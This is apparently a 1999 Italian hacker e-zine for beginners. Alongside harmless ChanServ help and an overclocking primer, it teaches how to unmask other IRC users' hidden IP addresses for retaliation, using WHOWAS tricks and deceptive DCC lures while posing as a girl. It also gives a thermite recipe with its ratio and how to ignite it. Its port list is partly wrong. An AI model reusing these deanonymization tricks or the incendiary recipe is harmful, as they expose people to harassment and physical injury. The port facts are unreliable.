-ChanServ- Nota: Bisogna avere un nick registrato per poter registrare un canale.
-ChanServ- Esempio: /msg ChanServ REGISTER #chrome echecazzo Canale dedicato
al mitico chromino etc. etc.
-ChanServ- ***** _End of Help_ *****
======================================
/MSG ChanServ Help Sop

-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - SOP
-ChanServ- Sintassi - SOP <canall> ADD <nick o mask>
-ChanServ- SOP <canale> DEL <nick o mask>
-ChanServ- SOP <canale> LIST
-ChanServ- SOP <canale> WIPE
-ChanServ- I Sop hanno il secondo maggior controllo di un canale (sono secondi
solo al fondatore del canale)
Il Fondatore e' l'unico che puo' aggiungere o eliminare un Sop.
Il comando WIPE cancellera' l'intera
lista degli AOp/VOp .
Un Sop puo' add/del/wipe Aop e Vop.
-ChanServ- Esempi: /msg ChanServ SOP #chrome add Black_Baron
-ChanServ- /msg ChanServ SOP #chrome del *lamer@*.tin.it
-ChanServ- /msg ChanServ SOP #chrome WIPE
-ChanServ- ***** _End of Help_ *****

NOTA: Per poter ottenere la lista degli Sop di un canale bisogna essere Vop,
Aop, Sop o fondatori del canale in questione.
======================================
/MSG ChanServ Help Aop

-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - AOP
-ChanServ- Sintassi - AOP <canale> ADD <nick o mask>
-ChanServ- AOP <canale> DEL <nick o mask>
-ChanServ- AOP <canale > LIST
-ChanServ- AOP <canale> WIPE
-ChanServ- Gli AOp hanno il terzo livello di accesso in un canale
-ChanServ- Solo un SOp o il fondatore di un canale
-ChanServ- possono aggiungere o eliminare un AOp.
-ChanServ- Il comando WIPE cancellera' l'intera
-ChanServ- lista degli AOp .
-ChanServ- Esempi: /MSG ChanServ AOP #chrome ADD venom
-ChanServ- /MSG ChanServ AOP #chrome DEL *lamer@*tin.it
-ChanServ- /MSG ChanServ AOP #chrome WIPE
-ChanServ- ***** _End of Help_ *****
======================================
/MSG ChanServ Help VOp

-ChanServ- ***** ChanServ Help *****
-ChanServ- Comando - VOP
-ChanServ- Sintassi - VOP <canale> ADD <nick o mask>
-ChanServ- VOP <channel> DEL <nick o mask>
-ChanServ- VOP <channel> LIST
-Chanserv- VOP <channel> WIPE
-ChanServ- I VOp hanno automaticamente voce in un canale.
Voice (voce) +v e' la possibilita' di parlare in un canale moderato +m.
-ChanServ- Esempi: /MSG ChanServ VOP #chrome ADD Master
-Chanserv- /MSG ChanServ VOP #chrome DEL *lamer@*.tin.it
-ChanServ- /MSG ChanServ VOP #chrome WIPE.
-ChanServ- ***** Fine dell'Help *****

Vop = Voice Operator
======================================
/MSG ChanServ Help AKICK

-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - AKICK
-ChanServ- Sintassi - AKICK <canale> ADD <nick o mask>
-ChanServ- AKICK <canale> DEL <nick o mask>
-ChanServ- AKICK <canale> LIST
-ChanServ- AKICK <canale> WIPE
-ChanServ- AKICK puo' essere usato dai SOp e dal fondatore del canale.
-ChanServ- Se un utente finisce nella lista akick del tuo canale
-ChanServ- e' immediatamente kickato e bannato fuori dal canale.
-ChanServ- Il comando WIPE cancellera' tutta la lista AKICK.
-ChanServ- Esempi: /msg ChanServ AKICK #chrome add lamer
-ChanServ- /msg ChanServ AKICK #chrome del *acire@arpa.com
-ChanServ- /msg ChanServ AKICK #chrome WIPE
-ChanServ- ***** _End of Help_ *****

Insomma, la lista akick e' la lista nera del canale, dove vengono inseriti gli
ospiti __indesiderati__.
======================================
/MSG ChanServ Help DROP

-ChanServ- ***** ChanServ Help *****
-ChanServ- Comando - DROP
-ChanServ- Sintassi - Drop <canale>
-ChanServ- Questo comando e' usato per eliminare un canale registrato. Solo
l'utente con l'accesso da fondatore puo' farlo {Vedi /msg chanserv
identify help}.
-ChanServ- Esempio: /MSG ChanServ DROP #chrome
-ChanServ- ***** Fine dell'Help *****
======================================
/MSG ChanServ Help SET

Questo comando e' molto importante e presenta numerose opzioni, esaminiamole:

-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - SET
-ChanServ- Sintassi - SET <canale> <comando> [<valore>]
-ChanServ- Questo comando ti permette di cambiare i settaggi
-ChanServ- e le procedure di un canale. Devi identificarti come fondatore
-ChanServ- del canale per modificare ognuno di questi settaggi.
-ChanServ- Settaggi disponibili:
-ChanServ- FOUNDER - Cambia il Fondatore del canale
-ChanServ- PASSWD - Cambia la Password del canale
-ChanServ- DESC - Cambia la descrizione del canale
-ChanServ- MLOCK - Setta il mode lock del canale
-ChanServ- MOTD - Registra il MOTD del canale
-ChanServ- URL - Cambia l'URL del canale
-ChanServ- EMAIL - Cambia l'indirizzo e-mail del canale
-ChanServ- MEMOLEVEL - Regola l'accesso per inviare memos al canale
-ChanServ- RESTRICT - Solo gli AOp e gli SOp possono restare nel canale
-ChanServ- OPGUARD - Solo gli AOp e gli SOp possono essere oppati
-ChanServ- TOPICLOCK - Solo il fondatore puo' cambiare il topic
-ChanServ- Per maggiori informazioni su un settaggio: /msg ChanServ help <setting>
-ChanServ- ***** _End of Help_ *****

Bene, ora vediamo gli help dei vari setting:
___________________________________________________
-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - FOUNDER
-ChanServ- Sintassi - SET <canale> FOUNDER <nuovo fondatore>
-ChanServ- Utilizzato per cambiare il fondatore di un canale.
-ChanServ- Il nuovo fondatore dev'essere un nick registrato.
-ChanServ- Esempio: /MSG ChanServ SET #chrome FOUNDER Ramesse
-ChanServ- ***** _End of Help_ *****
___________________________________________________
-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - PASSWD
-ChanServ- Sintassi - SET <canale> PASSWD <nuova password>
-ChanServ- Questo comando e' usato per cambiare
-ChanServ- la password di un canale registrato.
-ChanServ- Esempio: /MSG ChanServ SET #chrome PASSWD spippolo
-ChanServ- ***** _End of Help_ *****
___________________________________________________
-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - MLOCK
-ChanServ- Sintassi - SET <canale> MLOCK <modi>
-ChanServ- Il fondatore di un canale puo' bloccare i modi di un canale
-ChanServ- usando il comando mlock. Per bloccare un modo su un canale,
-ChanServ- devi prima identificarti con il ChanServ per poter effettuare qualsiasi
-ChanServ- cambiamento. Se hai dei modi bloccati sul tuo canale, solo il fondatore
-ChanServ- o un SOp sara' in grado di cambiare i modi dei canali.
-ChanServ- Esempio: /msg ChanServ SET #chrome MLOCK +stn
-ChanServ- ***** _End of Help_ *****

Questo comando e' molto utile, perche' cosi' il fondatore impedisce ai vari
chanop (eccetto i SOp) di cambiare certi modi 'lockati', ad es. puo' rendere
il canale ad invito e lockare, bloccare questo modo, che puo' essere modificato
solo da lui o dalle persone di cui si fida di piu'.
__________________________________________________
-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - MOTD
-ChanServ- Sintassi - SET <canale> MOTD <messaggio>
-ChanServ- Il fondatore di un canale puo' registrare un messaggio
-ChanServ- che il ChanServ mostera' a tutti gli utenti che entreranno nel canale.
-ChanServ- È il Message Of The Day: MOTD.
-ChanServ- Esempio: /msg ChanServ SET #chrome MOTD Benvenuti in #ChRome il
-ChanServ- canale dedicato al culto del celebre hacker degli SPP 8)))
-ChanServ- ***** _End of Help_ *****
__________________________________________________
-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - URL
-ChanServ- Sintassi - SET <canale> URL <url>
-ChanServ- Usato per cambiare l'URL del canale.
-ChanServ- L' URL del tuo canale sara' disponibile a chiunque
-ChanServ- richiedera' info sul tuo canale.
-ChanServ- Esempio: /MSG ChanServ SET #chrome URL http://www.spp.com
-ChanServ- ***** _End of Help_ *****
__________________________________________________
-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - MEMOLEVEL
-ChanServ- Sintassi - SET <canale> MEMOLEVEL <NONE|VOP|AOP|SOP|FOUNDER>
-ChanServ- Questo setting ci permette di specificare
-ChanServ- il livello di accesso richiesto per inviare memo al canale.
-ChanServ- Quando lo regoli a nessuno i memo del canale sono disabilitati.
-ChanServ- Se i memo vanno fuori controllo potresti desiderare di regolare il
-ChanServ- il memolevel a SOp or founder (fondatore) almeno temporaneamente.
-ChanServ- e lasciare calmare gli animi.
-ChanServ- Esempio: /msg ChanServ SET #chrome MEMOLEVEL VOP
-ChanServ- ***** _End of Help_ *****
_______________________________________________
-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - RESTRICT
-ChanServ- Sintassi - SET <canale> RESTRICT <ON/OFF>
-ChanServ- Questo comando e' usato per permettere solo solo agli AOp/SOp/Vop di
-ChanServ- entrare nel canale registrato. Chiunque altro sara' kickato e bannato
-ChanServ- quando tentera' di entrare in un canale ristretto.
-ChanServ- Esempio: /msg ChanServ SET #chrome RESTRICT on
-ChanServ- ***** _End of Help_ *****

In pratica se si regola un canale come ristretto, chiunque non sia AOp/SOp/VOp
finisce sulla akick list e non puo' entrare.
___________________________________________________
-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - OPGUARD
-ChanServ- Sintassi - OPGUARD <canale> <ON/OFF>
-ChanServ- Se regoli OPGUARD ON solo chi e' nella tua lista Aop/Sop puo'
-ChanServ- essere oppato nel canale. Chiunque altro venga oppato sara'
-ChanServ- automaticamente deoppato dal ChanServ.
-ChanServ- Esempio: /msg ChanServ SET #chrome OPGUARD ON
-ChanServ- ***** _End of Help_ *****
__________________________________________________
-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando- TOPICLOCK
-ChanServ- Sintassi - SET <canale> TOPICLOCK <ON/OFF>
-ChanServ- Questo settaggio permettera' solo agli op che vuoi
-ChanServ- di cambiare il topic. Se qcn che non e' autorizzato a cambiare il topic
-ChanServ- del tuo canale prova a cambiarlo, ChanServ riportera' il topic
-ChanServ- a quello che era originariamente.
-ChanServ- Esempio: /msg ChanServ SET #chrome TOPICLOCK on
-ChanServ- ***** _End of Help_ *****
__________________________________________________
======================================
/MSG ChanServ Help IDENTIFY

-ChanServ- ***** ChanServ Help *****
-ChanServ- Comando - IDENTIFY
-Chanserv- Sintassi - IDENTIFY <canale> <password>
-ChanServ- Per ottenere l'accesso da fondatore ad un canale, usa il comando
identify. Dopo esserti identificato in un canale hai il controllo
completo su di esso.
-ChanServ- Esempio: /MSG ChanServ IDENTIFY #chrome echecazzo
-ChanServ- ***** Fine dell'Help *****
======================================
/MSG ChanServ Help INFO

Vediamo cosa si ottiene con /MSG ChanServ INFO #chrome

-ChanServ- *** _#chrome_ is un canale dedicato al mitico ChRome, il canale e'
attualmente ancora in costruzione... {Qui appare la DESC, cioe'
la descrizione del canale che il fondatore o chi per lui ha scritto}
-ChanServ- Founder : Newbie
-ChanServ- Modelock : +rtn
-ChanServ- Topic : (no topic is set)
-ChanServ- Registered : 02/15/1999 10:27:40
-ChanServ- Last Opping : <unknown>
-ChanServ- Options : Topic Retention
-ChanServ- *** End of channel info ***

Mi sembra tutto abbastanza chiaro.
======================================
/MSG ChanServ Help UNBAN

-ChanServ- ***** ChanServ Help *****
-ChanServ- Comando - UNBAN
-ChanServ- Sintassi - UNBAN <canale>
-ChanServ- Utilizzato per cancellare la banlist di un canale.
-ChanServ- Esempio: /MSG ChanServ UNBAN #chrome
-ChanServ- ***** Fine dell'Help *****
======================================
/MSG ChanServ Help ACCESS

-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - ACCESS
-ChanServ- Sintassi - ACCESS <canale>
-ChanServ- Usa il comando ACCESS per scoprire che livello di accesso
-ChanServ- hai su un canale registrato
-ChanServ- Il ChanServ restituira' i seguenti valori:
-ChanServ- 6 - Identificato come il fondatore del canale
-ChanServ- 5 - Identified to the founders nick ???
-ChanServ- 4 - Channel SOp
-ChanServ- 3 - Channel AOp
-ChanServ- 2 - Channel VOp
-ChanServ- 1 - Normal user
-ChanServ- 0 - AKICK'ed user
-ChanServ- Esempio: /msg ChanServ ACCESS #chrome
-ChanServ- ***** _End of Help_ *****

Facciamo qualche esempio:

/MSG ChanServ ACCESS #lamers

-ChanServ- ACC Newbie #lamers - Level 1 (Normal user, no access)

/MSG ChanServ ACCESS #chrome

-ChanServ- ACC Newbie #chrome - Level 6 (Identified to the channel founders)
======================================
/MSG ChanServ Help OP

-ChanServ- Comando - OP
-ChanServ- Sintassi - OP <canale> <nick>
-ChanServ- Se sei un AOp in un canale, puoi usare ChanServ
-ChanServ- per dare a te o agli altri utenti lo status di chanop
-ChanServ- nel canale in questione.
-ChanServ- Esempio: /msg ChanServ OP #ChRome Newbie
-ChanServ- ***** _End of Help_ *****
======================================
/MSG ChanServ Help DEOP

-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - DEOP
-ChanServ- Sintassi - DEOP <canale> <nick>
-ChanServ- Se hai il livello di Aop o Sop in un canale, puoi usare
-ChanServ- questo comando per deoppare i chanop di quel canale.
-ChanServ- Esempio: /msg ChanServ DEOP #chrome Lamer
-ChanServ- ***** _End of Help_ *****
======================================
/MSG ChanServ Help INVITE

-ChanServ- Comando - INVITE
-ChanServ- Sintassi - INVITE <canale>
-ChanServ- Se hai un accesso AOp sul canale, puoi usare ChanServ per
-ChanServ- autoinvitarti nel canale in questione.
-ChanServ- Esempio : /MSG ChanServ INVITE #chrome
-ChanServ- ***** Fine dell'Help *****
======================================
/MSG ChanServ Help MDEOP

-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - MDEOP
-ChanServ- Sintassi - MDEOP <canale>
-ChanServ- Questo comando serve a deoppare ogni chanop in un canale
-ChanServ- incluso te stesso. Devi essere un Sop del canale per usare questo
-ChanServ- comando. MDEOP = Mass Deop.
-ChanServ- Esempio: /msg ChanServ MDEOP #chrome
-ChanServ- ***** _End of Help_ *****
======================================
/MSG ChanServ Help MKICK

-ChanServ- ***** ChanServ Help *****
-ChanServ- Comando - MKICK
-ChanServ- Sintassi - MKICK <canale>
-ChanServ- Usato per kickare qualsiasi utente dal tuo canale. Devi essere SOp
-ChanServ- nel canale per poter usare questo comando.
-ChanServ- Esempio: /MSG ChanServ MKICK #chrome
-ChanServ- ***** Fine dell'Help *****
======================================
/MSG ChanServ Help MODE

-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - MODE
-ChanServ- Sintassi - MODE <canale> <modi>
-ChanServ- Permette agli SOP di cambiare i modi del canale senza essere chanop di quel
-ChanServ- canale. Se hai settato il modo -k non hai bisogno di conoscere la chiave (key)
-ChanServ- del canale: metti invece una chiave qualsiasi (dummy key).
-ChanServ- Esempio: /msg ChanServ MODE #chrome +s
-ChanServ- /msg ChanServ MODE #chrome -k dummykey
-ChanServ- ***** _End of Help_ *****
======================================
======================================
======================================

###Come scoprire l'ip nonostante sia nascosto###

Su questi server IRC l'ultima parte dell'IP e' mascherata, per impedire nuke
ed altri scherzetti...
Gli IrcOp cmq il vostro Ip lo conoscono benissimo ed essendo severi non ci
penseranno due volte prima di mettere il vostro dominio nelle k-line per un
semplice clone o qualche bot innocente ;_;
Sulla rete di Azzurra l'uso di Wingate e simili non e' consentito in alcun
modo e non riuscirete ad usarli, in piu' c'e' il rischio di k-line.

Quindi i problemi che ci troviamo ad affrontare sono due:
1.)come ottenere l'IP degli altri???
2.)come nascondere il proprio agli altri (e soprattutto agli ircop)???

Ora passiamo alle soluzioni...

1.)TROVARE L'IP

Se effettuate un /WHOIS sul nick della persona di cui volete l'ip, otterrete
solo i primi tre numeri dell'ip...cio' nonostante non ci vuole poi molto a
scansionare una subnet e gli IP di altra gente della vostra sotto rete
collegata in quel momento e che sta chattando su IRC potrebbero essere
veramente pochi...
Ma esistono altri trucchetti per risalire rapidamente all'ip senza dover
usare nessuno scanner:

A- /WHOWAS <Integrazione ad opera di [MAX]>:
Molti server IRC non garantiscono nessun tipo di riservatezza per i dati
personali e in perticolare per l'ip di una persona.
E' il caso di irc.tin.it nel quale e' possibile grazie al comando /WHOIS
implementato anche nel menu popup di mIRC risalire all'IP di una persona
conoscendone il nick.
Altri server invece adottano una diversa politica "nascondendo" l'ultimo
byte dell'ip, oppure la parte meno significativa di un domain name quando
esiste. Vediamo allora quali possono essere le conseguenze; non far sapere
il proprio ip al lamer di turno puo' evitare fastidiose nukkate o robe varie
ma c'e' anche il rovescio della medaglia. Cosa facciamo al lamer che rende
invivibile la nostra chat se non riusciamo nemmeno a sapere il suo ip?
Considerando che e' (con l'aggiornamento del winsock) e' + sopportabile un
nuke che non un rompiscatole ecco il modo per aggirare l'inconveniente. Il
server ha l'ordine di non restituire l'ip completo quando a richiederlo e' il
comando /WHOIS ma non quando lo fa /WHOWAS.
Quest' ultimo comando e' meno noto, ma assai utile. Permette infatti di
conoscere l'ora in cui un certo nick si e' collegato nelle ultime 24 ore.
Fin qui nulla di utile pero' whowas ci dice anche l'ip col quale il nick si e'
connesso. Ok, il lamer ha l'ip dinamico come si fa? Si risolve il tutto con
un po' di social eng.. quella roba li' e si convince (magari sfidando il suo
sapere) il lamer a cambiare nick. In quel momento il suo nick e' storia e il
comando /WHOWAS e' felice di informarci del suo ultimo collegamento e del suo
ip COMPLETO che non e' di certo cambiato.
Quindi o il lamer e' preparato o ha pochi secondi ancora prima di dire addio
alla rete.
</Integrazione ad opera di [MAX]>

NOTA se il lamer si e' collegato per un po' e poi scollegato dal server e vi
si ricollega senza scollegarsi da Internet il /WHOWAS ci dara' il suo ip
attuale anke se non ha cambiato nick! :)
Quindi se il /WHOWAS ci da' un orario recente per l'ultima commessione del
lamer, con tutta probabilita' il suo IP e' lo stesso! ^_^

B- DCC: quando stabilite una connessione dcc con il qcn ottenete il suo ip
...quindi se volete individuare il lamer convincetelo ad aprire una sessione
dcc chat o a spedirvi qcs in dcc e avrete il suo ip!
Un metodo simpatico e' questo: clonatevi per due minuti (lo so che i cloni
non sono consentiti ma e' per una giusta causa! ;-) ovviamente usando la java
chat e un bel proxy come spieghero' piu' tardi e fingetevi ad es. una ragazza
...dopodiche' non ci vorra' molto a convincere il lamer ad chattare in dcc
con voi :)))))))) In fondo avete tante cose da dirgli...e da mandargli...
...hihihihi..attenzione agli interventi divini! ^_^

C- Diventate IrcOp o vi fate amico un IrcOp :) e ve lo fate dire da lui l'ip!!!

D- {Proposto da Buttha}: minacciate ChRome di non scrivere piu' articoli su
NetRunners se non si decide a rivelarvi come ca**o fa a sapere tutti gli
IP!!! 8)))))))))

P.S. Ovviamente, il metodo piu' godoso e' quello D, ma non tutti possono
attuarlo per forza di cose... :-\

2.)NASCONDERE IL PROPRIO IP

Poiche' l'uso di Wingate e simili non e' consentito...secondo me per nascondere
l'ip ci sono principalmente queste due vie:

A- Usate una java chat attraverso uno o piu' proxy. Una java chat ottimamente
funzionante per collegarsi alla rete di Azzurra e' www2.leonet.it.

B- Vi prendete una shell free o meno (10$ al mese) che consenta ircII e la usate :)
Di free shell attualmente funzionanti, disponibili per gli Italiani e che
consentano di chattare su IRC non ne conosco, se voi le conoscete e mi
informate mi fate un grandissimo piacere ( night_storm99@hotmail.com ).

C- Backdoor, etc. (ma visto che questa e' una rivista per newbie...limitatevi
ai primi due modi :)

In ogni caso, che ricorriate o meno a questi stratagemmi, evitate nel modo
piu' assoluto di cambiare nick (magari quando andate in Away) o di scollegarvi
e ricollegarvi al server durante lo stesso collegamento Internet...altrimenti
il /WHOWAS vi punira'...

P.S. Per i newbie: clone = se aprite piu' volte il vostro client Irc, ad es.
mIRC, e vi collegate allo stesso server o alla stessa rete con nick diversi
e chattate ad es. su uno stesso canale con 4 o 5 identita' differenti...ecco,
vi siete klonati ^_^
Bot = Batch Oriented Task e' semplicemente un client programmato per rispondere
in modo determinato a certi input...E' vietato su quasi tutte le reti...
Se volete averne uno dovrete trovarvi prima una free shell che li consenta...
Io non ne conosco, se voi si': informatemi per piacere ^_^ .


--Ringraziamenti:

Ringrazio tutti quelli che in maniera diretta o indiretta mi hanno aiutato a
scrivere questo infimo articolo: innanzitutto grazie ankora Max, grazie
Ramesse per l'idea della Java chat e poi voglio ringraziare N0bodY88 perche'
ha il coraggio di mettere nella sua zine questa merda (hhihihihihi ;), e il
mitico (^_^;;;;) ChRome per la sua presenza digitale sulle rete....Hihihihihi
...cromino come faremmo senza di te? ;-)
Per chi non lo sapesse il canale #chrome esiste veramente...hihihihihihi....
fateci un salto se vi va... ^_^
Infine un ringraziamento particolare a tutti quelli che ascoltano pazientemente
le mie ca**ate su IRC ^_^ e al carissimo RigoR per il supporto morale e non che
mi da'!
Ciao e arrivederci alle prossime avventure! 8-]°°°°°°

Newbie 1.1 sempre piu' niubbi 8))))))))

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

****************************************************************************
*IL MIGLIOR MODO PER .FONDERE TUTTO* di ULNTWH99 ( quanti mi hanno chiesto *
* l'origine di sto' nick )*
****************************************************************************

4 finocchi crudi (pure schifosi)
2 pomodori
1 fetta di prosciutto perche' l'altra se l'e' spappata il mio gatto :(
1 carota .che volete e' il mio pranzo di oggi .
musica ascoltata ultimo album offspring (nobo te lo devo dare)

Eccomi qua il vostro insegnante newbies/hardware.dunque oggi cosa faccio ?
SE NON LO SAI TU .
Si si okki.sto per descrivervi il modo piu' sottile per poter "fondere tutto"
senza il bisogno dell'ormai obsoleto GH uno dei miei tanti virus che pero' e'
stato creato con "l'innocuo" intento di distruggere gli HD (state tranquilli
non l'ho ancora dato in giro e mai lo faro' .ce ne sono gia' troppi) ;)
DIO CHE PALLE NON HO SCELTO DI LEGGERE QUESTO ART. PER SENTIRE LE TUE PRODEZZE !!!
Va bene ok ok !
Passiamo subito al sodo .
Parlero' dell'overclock (nobo88 pensaci un po' sopra) perche' e' il modo piu'
insicuro per sfruttare al massimo la CPU nel modo piu' economico esistente .
Allora io personalmente ve lo sconsigli questo procedimento ma onestamente
(senti un po' da che pulpito viene la predica ) con un bel pentium 450 Mhz
con 512 Mb di Sdram Mainboard Asus P2B-S e HD Quantum Viking 2 ultra2 36
Mb/sec dichiarati 16 reali .non ho molti di questi problemi :) .
Comunque sia se vi si fondesse tutto perche' avete beccato la partita poco
resistente di processori o peche' avete sbagliato non venite a rompere le
balle a me .azz ci mancherebbe .
I processori sono progettati per una certa velocita' ma c'e' sempre un certo
margine ulteriormente sfruttabile .
In questo art voglio illustrare quali sono le tecniche ed i rischi ai quali
si va in contro :
Per prima cosa cerchiamo di chiarire il concetto di "clock" , che e' alla
base dell'overclock sia del funzionamento di un qualsiasi pezzo elettronoco
sincrono .
Per misurare la "velocita' " di un clock , piu' precisamente la frequenza ,
si usa come unita' di misura l' "Hertz" ed i suoi multipli .
Ammettiamo che il nostro clock dia 4 impulsi al secondo , la sua frequenza
risulta essere di 4Hz e , tra un impulso e l'altro , trascorrono 0.45 secondi,
cioe' 250 millisecondi .
Nei nostri PC c'e' un clock base , quello della scheda madre , che viene
moltiplicato e diviso in modo da ottenere vari segnali sincronizzati che
scandiscono il "ritmo" per tutte le periferiche .
Tale clock detto anche velocita' di BUS o della mainboard puo' variare dai
classici 66 al centinaio di Mhz (nota : avere il bus piu' veloce significa
avere maggiori prestazioni nelle periferiche isa e quelle pci che non mi
fermero' a descrivere) .
Questo segnale di clock viene diviso tipicamente in due , cioe' dimezzato ,
in modo da ottenere il clock del bus pci essendo esso un bus sincrono .
Infatti il pci odierno non potrebbe superare i 33 Mhz .
Il clock della mainboard viene acora diviso per ottenere frequenze dell'ordine
dei 10/12 Mhz : tale segnale serve per sincronizzare il merdoso vecchissimo
bus isa . Alla frequenza della mainboard viene sincronizzato anche l'accesso
alla memoria RAM e , nelle schede madri con socket 7 , anche alla memoria
cache di secondo livello saldata suula scheda .
E' la CPU ? DOVE CAZZO LA LASCI RINCOGLIONITO ?
Calma , calma arrivo .La cpu e' dai tempi del processore 80486 Dx2 di intel
che riceve in ingresso il clock di sistema e lo moltiplica .
Per esempio un 486 Dx2 a 66Mhz deve essere montato su una mainboard a 33Mhz,
la cpu moltiplichera' per 2 tale clock e internamente lavorera' a 66 Mhz .

FINE PRIMA PARTE ULNTWH99

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ IP ROUTING ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

IP ROUTING:

Se si utilizza una connessione diretta ad internet tramite windowz con due
schede di accesso remoto da e verso l'esterno , ad esempio una il R.A.S
[Remote Accesss Service] e l' altra per internet , il metodo migliore
consiste nell' aumentare il livello di sicurezza della macchina consiste del
disabilitare appunto l' ip routing

RESISTENZA PASSIVA:

Per aumentare notevolmente il vostro livello di sicurezza e' opportuno
utilizzare , secondo me , proxy e firewall:

I proxy sono dei particolari software che si frappongono fra le applicazioni
di rete e la rete stessa , dediando e filtrando la rete stessa , essi funzionano
in due modi:
A livello circuito
A Livello applicazione

I firewall servono a bloccare l' entrata a determinate porte [scusate la
definizione] ed utilizziano diversi protocolli di trasporto [ o meglio li
bloccano , bha oggi le def. non sono il mio forte ]
i protocolli citati sono :
UDP [User Datagram Protocl]
ICMP [Internet Control Message Protocol ]
TCP [Trasmission Control Protocol]
e poi abbiam le varie porte
25 telnet
512 , 513 RSH RCDM
119 NNTP
110 POP3
80 HTTP
520 RIP
67 e 69 BOOTP e TFTP
79 FINGER

e molto altro ...


COME METTERE IN UNA BLACK LIST IL TUO PEGGIOR NEMICO:

ALcuni programmi consentono di trasferire automaticamente i msg indesiderati
nel '' cestino '' , questi prog si appoggiano a delle care black list
Puoi crarne una personalizzata e ci sono cari provider che ti danno questa
bella opportunita':

ecco alcuni link:

http://www.idotal.com/prefferedmail/.
http://maps.vix.com
http://www.bitgate.com/spam/
http:/www.webeasy.com:8080/spam/

PUBBLICITA' :
allora per farla diciamo che mi hanno un bel poco costretto ma magari ci
ricavo un poco di spazio per l' e-zines for free allora

ALPHASAT
wwww.alphasat.com
realizzazione domini a partire da lire 129000
con 3mb di spazio telnet
ftp
email
ftp

IL GRANDE FITZBAN SI FA' SENTIRE [sei mitico]

TERMITE:

Okkey, siamo qui per il primo di una lunga {spero} serie di articoli,
ovviamente tutti dal punto di vista TEORICO, visto che sono tutte cazzate
PIUTTOSTO pericolose da fare, per cui : DON`T TRY THIS AT HOME.

Dopo questa dovuta precisazione partiremo con un articolo sulla termite,
che non e` il simpatico insetto che potete somministrare ai mobili del vostro
odiato vicino per ridurglieli in segatura in poco temp[comunque anche quest
e' un'idea da predndere in considerazione]o, ma un tipo di esplosivo poco
conosciuto che permette di scaldare il metallo fino a ridurlo in tanti
piiiiiiccoli rivoletti di metalo fuso.
La termite si ottiene miscelando in proporzione 2,7:1 polvere di ossido di
ferro [un modo elegante per dire ruggine] a polvere di alluminio [ottenibile
raschiando con la vostra fida lima un bella lattina di alluminio].
Miscelate il tutto in un cilindretto di cartone e date fuoco al tutto,
ma attenzione, per accendere il tutto serve qualcosa di MOLTO caldo, come
l'accensione di un tocchetto di magnesio.
Alla Prossima
Fizban

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ TROJAN FOR DUMMIES ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

IMPARATE TUTTI I TROJAN IN 4 MINUTI 35 SECONDI E 4 DECIMI......

mumble...mumble... come iniziare vediamo un po'....

Non so' se questo articolo lo leggerete mai e non so' neanche dove, nel caso,
lo stiate leggendo!!! (l'ho promesso ha 14 persone!!!) :))))))

Iniziamo...la leggenda del cavallo di troia spero la conosciate tutti.....
una statua di legno di grande mole, nel cui interno, vennero nascosti i
migliori guerrieri greci, e che fu abbandonata sotto le mura di Troia.
I Troiani ingannati da Sinone la credettero un'offerta votiva e introdussero
il cavallo in citta': i guerrieri greci ne uscirono durante la notte, aprirono
le porte di Troia e provocarono la caduta della citta', che aveva resistito
dieci anni all'assedio.....faccio il Liceo!!!!!

